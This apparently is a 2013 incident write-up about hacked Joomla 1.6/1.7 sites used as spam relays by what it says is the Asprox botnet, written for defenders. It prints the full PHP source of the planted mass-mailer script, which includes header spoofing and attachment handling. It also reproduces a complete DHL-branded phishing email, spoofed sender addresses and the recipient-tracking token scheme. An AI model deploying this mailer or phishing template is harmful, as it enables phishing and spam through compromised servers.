07.30
On the 26.07.2013 we have seen over 200 hacked Joomla Sites with Joomla 1.6 and 1.7.
The Attacker hacked the sites two days earlier on 24.07.2013 between 22:11 and 22:56 +0200 o’clock.
[UPDATE 31.07.2013 23:46 +0200]
Some Researchers contact us, that the Scripts/Attacks comes from the Asprox Botnet.
Now, we seen some times Warnings again for Mailsystem or our Monitoring find called Malware-Scripts like this:
http://domain.tld/components/com_[random]/[random][example: f18n6e].php
The script gets the following Data over POST:
- emails
- themes
- messages
- froms
- mailers
- aliases
- passes
- code
The Post-Variables in Details:
emails
this has the Recipient-Address in Format [name base64] => emailaddress its look so:
[36xxxxxj2+9D1rA+vDETNQ==] => xxxxx6@aol.com
In the Variable, there was 30 Addresses.
themes
There has the Subjects/Themes like this: Tracking Information, Shipping Info, Tracking Detail, Order Tracking, Shipping Information, Order Shipped, Tracking Info…..
messages
This has the body of Mail with the Phishing-Mail and Links like this:
<html>
<body>
<font style="margin-left: 7px;">
If the links are not working, please move message to "Inbox" folder.
</font>
<br>
<div style="background-color:#FFCC00;width:410px;height:50px;">
<font style="background-color:#FFCC00;font-family: Arial Black, Gadget, sans-serif; font-weight:bold;">
<font style="color:#D60915; font-size: 37px; margin-left: 270px; font-style:italic">
DHL
</font>
</font>
</div>
<div style="position:relative;background-color:#D60915;width:410px;height:25px;"></div>
<div style="position:absolute;width:100px;margin-top:-51px;margin-left:287px;">
<hr size="2" color="#FFCC00" />
</div>
<div style="position:absolute;width:22px;margin-top:-50px;margin-left:359px;">
<hr size="2" color="#D60915" />
</div>
<div style="position:absolute;width:23px;margin-top:-47px;margin-left:358px;">
<hr size="2" color="#D60915" />
</div>
<div style="position:absolute;width:24px;margin-top:-44px;margin-left:357px;">
<hr size="2" color="#D60915" />
</div>
<div style="position:absolute;width:25px;margin-top:-51px;margin-left:247px;">
<hr size="2" color="#D60915" />
</div>
<div style="position:absolute;width:24px;margin-top:-48px;margin-left:247px;">
<hr size="2" color="#D60915" />
</div>
<div style="position:absolute;width:23px;margin-top:-45px;margin-left:247px;">
<hr size="2" color="#D60915" />
</div>
<div style="position:relative;margin-top:-5px; left: 20px; font-family:Arial,serif;font-size:13">
<br>
<b>
DHL Notification<br><br>
Tracking ID: 00[NUM-8]<br>
Status: Shipment not delivered
</b><br>
<br>
Your parcel has arrived at July 24th. Courier was unable to deliver<br>
the parcel to you.<br>
<br>
To get additional information use any of these options:<br>
<br>
<div style="position: relative;left: 20px;">
1) Go to the following URL in your browser:<br><br>
<font style="margin-left:90px;font-weight:bold;">
<a href="http://domain.tld.ba/main.php?info=[FTEIL]">Get Shipment Info</a><br>
</font>
<br>
2) Enter the <b>Tracking ID</b> on tracking page:<br><br>
<font style="margin-left:90px;font-weight:bold;">
<a href="http://domain.tld.ba/main.php?info=[FTEIL]">Tracking Page</a><br>
</font>
</div>
<br>
<br>
<b>Disclaimer:</b><br>
This message was created by DHL System.<br>
No authentication of email address has been performed.<br>
<br>
</div>
<div style="background-color:#FFCC00;width:410px;height:26px;">
<font face="Arial" style="font-weight:bold; margin-left: 5px;font-size: 15px;">
Deutsche Post DHL</font>
<font face="Arial" style="font-weight:bold; margin-left:10px; font-size: 10px;">
2013 DHL International GmbH. All rights reserved.
</font>
</div>
</body>
</html>
froms
The „froms“ has the „envelope senders“ like this:
„Economy Shipping“ <no_reply@posttherapy.com>“
„Mail International“ <support@segnaposto.com>
„Postal Service“ <NoReply@grposters.com>“
….. and more …..
mailers
the mailers has the „Mail-Sender-Scripts/Servers“ like this:
AOL9.0forWindowsUSsub541
Achi-KochiMailLitever1.00
MyPHPMailer
… and more ….
aliases and passes
there have only „YTowOnt9“ as value
code
if(!isset($_POST["emails"])
OR !isset($_POST["themes"])
OR !isset($_POST["messages"])
OR !isset($_POST["froms"])
)
{
exit();
}
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = $_SERVER['SERVER_ADDR'];
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
if(get_magic_quotes_gpc())
{
foreach($_POST as $key => $post)
{
$_POST[$key] = stripcslashes($post);
}
}
$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));
if(isset($_SERVER))
{
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
if(isset($_FILES))
{
foreach($_FILES as $key => $file)
{
$filename = alter_macros($aliases[$key]);
$filename = num_macros($filename);
$filename = text_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
}
}
if(empty($emails))
{
exit();
}
foreach ($emails as $fteil => $email)
{
$theme = $themes[array_rand($themes)];
$theme = alter_macros($theme["theme"]);
$theme = num_macros($theme);
$theme = text_macros($theme);
$theme = xnum_macros($theme);
$message = $messages[array_rand($messages)];
$message = alter_macros($message["message"]);
$message = num_macros($message);
$message = text_macros($message);
$message = xnum_macros($message);
$message = pass_macros($message, $passes);
$message = fteil_macros($message, $fteil);
$from = $froms[array_rand($froms)];
$from = alter_macros($from["from"]);
$from = num_macros($from);
$from = text_macros($from);
$from = xnum_macros($from);
$mailer = $mailers[array_rand($mailers)];
send_mail($from, $email, $theme, $message, $mailer);
}
function send_mail($from, $to, $subj, $text, $mailer)
{
$un = strtoupper(uniqid(time()));
$head = "From: $from\n";
$head .= "X-Mailer: $mailer\n";
$head .= "Reply-To: $from\n";
$head .= "Mime-Version: 1.0\n";
$head .= "Content-Type: multipart/alternative;";
$head .= "boundary=\"----------".$un."\"\n\n";
$plain = strip_tags($text);
$zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
$zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
$zag .= "------------".$un."--";
if(count($_FILES) > 0)
{
foreach($_FILES as $file)
{
if(file_exists($file["tmp_name"]))
{
$f = fopen($file["tmp_name"], "rb");
$zag .= "------------".$un."\n";
$zag .= "Content-Type: application/octet-stream;";
$zag .= "name=\"".$file["name"]."\"\n";
$zag .= "Content-Transfer-Encoding:base64\n";
$zag .= "Content-Disposition:attachment;";
$zag .= "filename=\"".$file["name"]."\"\n\n";
$zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
fclose($f);
}
}
}
if(@mail($to, $subj, $zag, $head))
{
if(!empty($_POST['verbose']))
echo "SENDED";
}
else
{
if(!empty($_POST['verbose']))
echo "FAIL";
}
}
function alter_macros($content)
{
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
{
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
}
return $content;
}
function text_macros($content)
{
preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$word = generate_word($rand);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$count = $matches[1][$i];
$word = generate_word($count);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
return $content;
}
function xnum_macros($content)
{
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$num = $matches[1][$i];
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function num_macros($content)
{
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function generate_word($length)
{
$chars = 'abcdefghijklmnopqrstuvyxz';
$numChars = strlen($chars);
$string = '';
for($i = 0; $i < $length; $i++)
{
$string .= substr($chars, rand(1, $numChars) - 1, 1);
}
return $string;
}
function pass_macros($content, $passes)
{
$pass = array_pop($passes);
return str_replace("[PASS]", $pass, $content);
}
function fteil_macros($content, $fteil)
{
return str_replace("[FTEIL]", $fteil, $content);
}
function from_host($content)
{
if(empty($replace))
{
$replace = (!empty($_SERVER['SERVER_ADMIN'])) ? $_SERVER['SERVER_ADMIN'] : NULL;
$pos = strpos($replace, "@");
$replace = substr($replace, $pos);
}
$replace = (empty($replace) AND ! empty($_SERVER['SERVER_NAME'])) ? $_SERVER['SERVER_NAME'] : NULL;
$replace = (empty($replace) AND ! empty($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : NULL;
$domains = @explode(".", $replace);
if(!empty($domains))
{
$level1 = @array_pop($domains);
$level2 = @array_pop($domains);
$replace = $level2.".".$level1;
}
return str_replace("[FHOST]", $replace, $content);
}
The [FTEIL] is replaced with the first Part/Code of $emails like this „svhIcxxxxxxxZkw==“, so he Spamer can see, which E-Mailaddress has open the Link.
Currently different IPs from AE (like this 31.184.xxx.xxx) makes the POST-Requests and sent/trigger the Spam-Scripts.
In the Messages-Part, the Phishing-URL is hard coded insert.
When i was a Spamer, i would set a List of phishing-urls and try to check it, if the phishing-site blocked or online, so you have less working 😉
If you need more Details, please contact us.
This is most probably part of Asprox botnet.
More info on: http://rebsnippets.blogspot.com/asprox
Best regards
Michal Ambroz